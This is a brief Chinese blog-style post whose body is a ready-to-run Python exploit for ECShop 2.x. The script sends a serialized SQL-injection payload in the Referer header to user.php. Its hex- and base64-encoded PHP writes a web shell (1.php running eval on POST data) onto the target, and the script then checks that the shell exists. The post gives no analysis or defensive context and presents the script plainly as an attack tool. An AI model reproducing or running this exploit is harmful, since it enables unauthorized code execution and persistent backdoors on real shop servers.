python学习之ecshop exp编写

针对ecshop 2.x，漏洞分析请查看网上分析，不再赘述。

# -*- coding:utf-8 -*-


import requests
import time

def ecshop(url):
    time.sleep(5)
    url_exp=url+"/user.php"
    a = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}"
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
               'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': a,
               'Accept-Encoding': 'gzip, deflate'}

    header={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                            (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
   # m = requests.get(url=url, headers=headers)

    try:
        s=requests.get(url_exp,header)
        if(s.status_code==200):
            print("漏洞文件存在，开始验证")
            time.sleep(5)
            m = requests.get(url=url_exp, headers=headers)

           # print("开始验证")
            url=url+"/1.php"
            url_index=requests.get(url)
            time.sleep(3)
            if(url_index.status_code==200):
                print("攻击成功，请访问 \n"+url)
            else:
                print("失败，请人工检测")
        else:
            print("漏洞不存在")
    except:
        print("网络出错")

if __name__ == '__main__':
    ecshop("http://www.ecshop.kk")

不要问我为什么加延迟，因为逼格高